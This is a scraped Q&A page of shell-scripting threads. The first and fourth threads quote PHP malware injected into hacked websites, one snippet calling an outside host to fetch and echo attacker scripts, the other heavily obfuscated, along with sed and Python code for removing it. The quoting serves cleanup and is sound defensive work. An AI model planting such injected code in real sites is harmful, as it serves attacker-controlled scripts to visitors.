Find-and-replace multiple complex lines in Linux - linux

I'm trying to clean up a security breach. I want to find all instances of the offending PHP code on the web directory and remove them. It looks like this:
<?php
#c9806e#
error_reporting(0); ini_set('display_errors',0); $wp_xoy23462 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_xoy23462) && !preg_match ('/bot/i', $wp_xoy23462))){
$wp_xoy0923462="http://"."template"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_xoy23462);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_xoy0923462);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_23462xoy = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_23462xoy,1,3) === 'scr' ){ echo $wp_23462xoy; }
#/c9806e#
?>
<?php
?>
(c9806e is a random alphanumeric string)
I've found lots of resources for using find, sed, and grep to replace simple things. I can probably cobble up something based on all that, but I would not be sure that it works, or that it won't break anything.
Here are the tools I have:
GNU Awk 3.1.7
GNU grep 2.6.3
GNU sed 4.2.1
GNU find 4.4.2
Here's the offending code with escaped characters.
<\?php
#\w+#
error_reporting\(0\); ini_set\('display_errors',0\); $wp_xoy23462 = #$_SERVER\['HTTP_USER_AGENT'\];
if \(\( preg_match \('/Gecko\|MSIE/i', $wp_xoy23462\) && !preg_match \('/bot/i', $wp_xoy23462\)\)\)\{
$wp_xoy0923462="http://"\."template"\."class"\."\.com/class"\."/\?ip="\.$_SERVER\['REMOTE_ADDR'\]\."&referer="\.urlencode\($_SERVER\['HTTP_HOST'\]\)\."&ua="\.urlencode\($wp_xoy23462\);
$ch = curl_init\(\); curl_setopt \($ch, CURLOPT_URL,$wp_xoy0923462\);
curl_setopt \($ch, CURLOPT_TIMEOUT, 6\); curl_setopt\($ch, CURLOPT_RETURNTRANSFER, 1\); $wp_23462xoy = curl_exec \($ch\); curl_close\($ch\);\}
if \( substr\($wp_23462xoy,1,3\) === 'scr' \)\{ echo $wp_23462xoy; \}
#/w+#
\?>
<\?php
\?>
Edit: As it turned out, some of the linebreaks were \r\n instead of \n. (Others were just '\n'.)

sed -n '1! H;1 h
$ {x
: again
\|<?php\n#\([[:alnum:]]\{1,\}\)#\nerror_reporting(0).*#/\1#\n?>\n<\?php\n\n\?>| s///
t again
p
}'
version that seems to work on GNU sed (thanks #leewangzhong)
sed -n '1! H;1 h
$ {x
: again
\|<?php\r*\n#\([[:alnum:]]\{6\}\)#\nerror_reporting(0).*#/\1#\r*\n?>\r*\n<?php\r*\n\r*\n?>| s///
t again
p
}'
Try something like this but it depend really of internal code format (\n, space, ...)
concept:
load all the file in buffer (sed work line by line by default) to allow the \n pattern
1! H;1 h
is used for loading each line at read time (from working buffer) into hold buffer
$ {x
take back x info from hold buffer into working buffer (swap content in fact) when at the last line $, so sed is now working on the full file including \n at end of each line
search and modify (remove) a pattern starting with
if found one, restart the operation (so with a new ID)
if not found (so no more bad code), print the result (cleaned code)

Using Python instead of sed for the replacement.
The regex:
<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>
The regex with comments:
<\?php #Start of PHP code (escape the '?')
\s+ #Match any number of whitespace
#(\w+)#\s+ #Hax header: one or more alphanumeric
#symbols, and use parens to remember this group
error_reporting\(0\) #To be really sure that this isn't innocent code,
#we check for turning off error reporting.
[^#]+ #Match any character until the next #, including
#newlines.
#/\1#\s+ #Hax footer (using \1 to refer to the header code)
\?> #End of the PHP code
[^>]+> #Also catch the dummy <?php ?> that was added:
#match up to the next closing '>'
# $find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out
The Python script:
#Python 2.6
import re
haxpattern = r"<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>"
haxre = re.compile(haxpattern)
#Takes in two file paths
#Prints from the infile to the outfile, with the hax removed
def unhax(input,output):
with open(input) as infile:
with open(output,'w') as outfile:
whole = infile.read() #read the entire file, yes
match = haxre.search(whole)
if not match: #not found
return
#output to file
outfile.write(whole[:match.start()]) #before hax
outfile.write(whole[match.end():]) #after hax
#return the removed portion
return match.group()
def process_and_backup(fname):
backup = fname+'.bak2014';
#move file to backup
import os
os.rename( fname, backup )
try:
#process
print '--',fname,'--'
print unhax(input=backup, output=fname)
except Exception:
#failed, undo move
os.rename( backup, fname)
raise
def main():
import sys
for arg in sys.argv[1:]:
process_and_backup(arg)
if __name__=='__main__':
main()
The command:
find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out
The command, explained:
find #Find,
. #starting in the current folder,
-type f #files only (not directories)
-name "*.php" #which have names with extension .php
-exec grep #and execute grep on each file with these args:
-l #Print file names only (instead of matching lines)
--null #End prints with the NUL char instead of a newline
"wp_xoy0923462" #Look for this string
{} #in this program ("{}" being a placeholder for `find`)
\; #(End of the -exec command
| #Use the output from above as the stdin for this program:
xargs #Read from stdin, and for each string that ends
-0 #with a NUL char (instead of whitespace)
-I fname #replace "fname" with that string (instead of making a list of args)
#in the following command:
python #Run the Python script
unhaxphp.py #with this filename, and pass as argument:
fname #the filename of the .php file to unhax
>> unhax.out #and append stdout to this file instead of the console

Related

How do I use perl-rename to replace . with _ on linux recursively, except for extensions

I am trying to rename some files and folders recursively to format the names, and figured find and perl-rename might be the tools for it. I've managed to find most of the commands I want to run, but for the last two:
I would like for every . in a directory name to be replaced by _ and
for every . but the last in a file name to be replaced with _
So that ./my.directory/my.file.extension becomes ./my_directory/my_file.extension.
For the second task, I don't even have a command.
For the first task, I have the following command :
find . -type d -depth -exec perl-rename -n "s/([^^])\./_/g" {} +
Which renames ./the_expanse/Season 1/The.Expanse.S01E01.1080p.WEB-DL.DD5.1.H264-RARBG ./the_expanse/Season 1/Th_Expans_S01E0_1080_WEB-D_DD__H264-RARBG, so it doesn't work because each word character before an . is eaten.
If instead type :
find . -type d -depth -exec perl-rename -n "s/\./_/g" {} +, I rename ./the_expanse/Season 1/The.Expanse.S01E01.1080p.WEB-DL.DD5.1.H264-RARBG into _/the_expanse/Season 1/The_Expanse_S01E01_1080p_WEB-DL_DD5_1_H264-RARBG which doesn't work either because the current directory is replaced by _.
If someone could give me a solution to:
replace every . in a directory name by _ and
replace every . but the last in a file name with _
I'd be very grateful.
First tackling the directories with .
# find all directories and remove the './' part of each and save to a file
$ find -type d | perl -lpe 's#^(\./|\.)##g' > list-all-dir
#
# dry run
# just print the result without actual renaming
$ perl -lne '($old=$_) && s/\./_/g && print' list-all-dir
#
# if it looked fine, rename them
$ perl -lne '($old=$_) && s/\./_/g && rename($old,$_)' list-all-dir
This part s/\./_/g is for matching every . and replacing it with _
Second tackling the file extensions, rename . except . for file extension
# find all *.txt file and save or your match
$ find -type f -name \*.txt | perl -lpe 's#^(\./|\.)##g' > list-all-file
#
# dry run
$ perl -lne '($old=$_) && s/(?:(?!\.txt$)\.)+/_/g && print ' list-all-file
#
# if it looked fine, rename them
$ perl -lne '($old=$_) && s/(?:(?!\.txt$)\.)+/_/g && rename($old,$_) ' list-all-file
This part (?:(?!\.txt$)\.)+ is for matching every . except the last . before the file extension.
NOTE
Here I used .txt and you should replace it with your match. The Second code will rename input like this:
/one.one/one.one/one.file.txt
/two.two/two.two/one.file.txt
/three.three/three.three/one.file.txt
to such an output:
/one_one/one_one/one_file.txt
/two_two/two_two/one_file.txt
/three_three/three_three/one_file.txt
and you can test it here with an online regex match.

sed- insert text before and after pattern

As a part of optimisation, I am trying to replace all Java files containing the string:
logger.trace("some trace message");
With:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
N.B. Some trace message is not the exact string but an example. This string will be different for every instance.
I am using a bash script and sed but can't quite get the command right.
I have tried this in a bash script to insert before:
traceStmt="if (logger.isTraceEnabled())
{
"
find . -type f -name '*.java' | xargs sed "s?\(logger\.trace\)\(.*\)?\1${traceStmt}?g"
I have also tried different variants but with no success.
Try the following using GNU sed:
$ cat file1.java
1
2
logger.trace("some trace message");
4
5
$ find . -type f -name '*.java' | xargs sed 's?\(logger\.trace\)\(.*\)?if (logger.isTraceEnabled())\n{\n \1\2\n}?'
1
2
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
4
5
$
If you would like to prevent adding new line endings
sed will add \n to the end of files that do not end in \n)
You could try like:
perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' file.java
notice the ending /e
The evaluation modifier s///e wraps an eval{...} around the replacement string and the evaluated result is substituted for the matched substring. Some examples:
In this case from your example, the file input contains:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
If have multiple files you could try:
find . -type f -name '*.java' -exec perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' {} +

Save result of find and md5sum commands into array for further processing

I need to save the result of find+md5sum commands for a further processing inside a for loop. How to save it into array variable properly? Here is a part of my script with some test data:
IFS=\n
FILES_1=($(find ${DIR_1} -type f -exec md5sum {} + | sort -k 2))
i=0
for line in ${FILES_1[*]} ; do
echo ${line}
i=$(($i+1))
done
echo ${i} #just for check
Result:
d0c096a5b5d91ab188723713fd5e6357 test/dir1/dir/qwerty.py
e90d6e2e9e0e4554d902fe84b6e08604 test/dir1/dir/source.py
e98cf83497d25feea1e37274183744c3 test/dir1/file.txt
e5bd0a793460559be2e689d39ad9f037 test/dir1/file2.txt
222bec76ce8f3afc0b44ae409d2b03bf test/dir1/script1.py
bdd50254b0036bc6b7c136f335f1460e test/dir1/script2.py
eead78462722fce1e7e27a2ec69b78bd test/dir1/script3.py
7f609c0dd1490a5e8e4f69ddcdec6500 test/dir1/script4.py
3d4f2eb5d55096a02214e21701a472fa test/dir1/script5.py
So, after execution i = 1, not 9. And I can't access a certain element by index (i). I mean I'm expecting to see one (first) string if I write "echo ${FILES_1[0]}" but I see them all and see nothing if "echo ${FILES_1[1]}".
Seems like it's just one string. What am I doing wrong?
IFS=\n
You set your input field separator to \ slash (literal slash) or n (literal letter n). There are no slashes or n in your input, so all gets assigned to the first element of the array.
You want:
IFS=$'\n'
The $'...' construct expands escape sequences inside it to another characters. The \n escape sequence gets expanded inside $'' to a newline (0x0a in hex).
You can store the md5sum as value of an associative array with file path as key
#!/usr/bin/env bash
declare -A arr
while IFS=' ' read -r -d '' v k; do
arr[$k]="$v"
done < <(find . -type f -exec md5sum --zero {} +)
Then
echo "${arr["test/dir1/script1.py"]}"
Would print:
222bec76ce8f3afc0b44ae409d2b03bf
Try ((i=i+1)) instead of i=$(($i+1)) for the counter variable.
To populate an array, do this:
x=()
*for loop*
x += (next element)
*end of for loop*

Replacing large string of text in Linux

I have several 1000 WP files that were injected with string such as the following:
I know I can do a replace with something like this:
find . -type f -exec sed -i 's/foo/bar/g' {} +
But I am having a problem getting the large string to be taken correctly. All the " and ' cause the string to jump out of my CLI.
Below is a sample string:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\1162]y4c##j0#67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1pde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5cujojRk3%x5c%x7860{666~7878Bsfuvso!sboepn)%x5c%x7825epnbss-x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%xp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uc%x7825Z<#opo#>b%x5c%x7<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x70QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x!Ydrr)%x5c%x7825r%x5c%x%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x560msvd}+;!>!}%x5c%x7827;!>tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2e:4e, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>
EXAMPLE of what I tried:
perl -pi -e 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $rlapmcvfunction fjfgg($n){%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782c%x7824*!|!%x5c%x7824-...x2a\57\x20"; $qenzappyva=substr($rlapmcvoxs,(48535-38422),(59-47)); $qenzappyva($rrzeotjace, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>//g' /home/......../content-grid.php
-bash: !: event not found
If the match is identical and on a separate line you can use comm
comm -23 source subtract
where subtract is the file with the contents to be removed from the source file. It's not an in place replacement so you have to create a temp file and overwrite the source after making sure it does what you need.
If you don't care about the extra newline, the simple approach using sed would be:
find . -type f -exec sed -i 's/.*\\x61\\156\\x75\\156\\x61.*$//g' {} +
sed can also handle the newline, but that is a little more complex.

Remove a null character (Shell Script)

I've looked everywhere and I'm out of luck.
I am trying to count the files in my current directory and all sub directories so that when I run the shell script count_files.sh it will produce a similar output to:
$
2 sh
4 html
1 css
2 noexts
(EDIT the above output should have each count and extension on a newline)
$
where noexts are either files without any period as an extension (ex: fileName ) or files with a period but no extension (ex: fileName. ).
this pipeline:
find * | awf -F . '{print $NF}'
gives me a comprehensive list of all the files, and I've figured out how to remove files without any period (ex: fileName ) using sed '/\//d'
MY ISSUE is that I cannot remove the files from the output of the above pipeline that are separated by a period but have NULL after the period (ex: fileName. ), as it is separated by the delimiter '.'
How can I use sed like above to remove a null character from a pipe input?
I understand this could be a quick fix, but I've been googling like a madman with no luck. Thanks in advance.
Chip
To filter filenames that end with ., since filenames are the whole input line in find's output, you could use
sed '/\.$/d'
Where \. matches a literal dot and $ matches the end of the line.
However, I think I'd do the whole thing in awk. Since sorting does not appear to be necessary:
EDIT: Found a nicer way to do it with awk and find's -printf action.
find . -type f -printf '%f\n' | awk -F. '!/\./ || $NF == "" { ++count["noext"]; next } { ++count[$NF] } END { for(k in count) { print k " " count[k] } }'
Here we pass -printf '%f\n' to find to make it print only the file name without the preceding directory, which makes it much easier to work with for our purposes -- this way there's no need to worry about periods in directory names (such as /etc/somethingorother.d). The field separator is '.', the awk code is
!/\./ || $NF == "" { # if the line (the filename) does not contain
# a period or there's nothing after the last .
++count["noext"] # increment the "noext" counter
# note that this will be collated with files that
# have ".noext" as filename extension. see below.
next # go to the next line
}
{ # in all other lines
++count[$NF] # increment the counter for the file extension
}
END { # in the very end:
for(k in count) { # print the counters.
print count[k] " " k
}
}
Note that this way, if there is a file "foo.noext", it will be counted among the files without a filename extension. If this is a worry, use a special counter for files without an extension -- either apart from the array or with a key that cannot be a filename extension (such as one that includes a . or the empty string).

Resources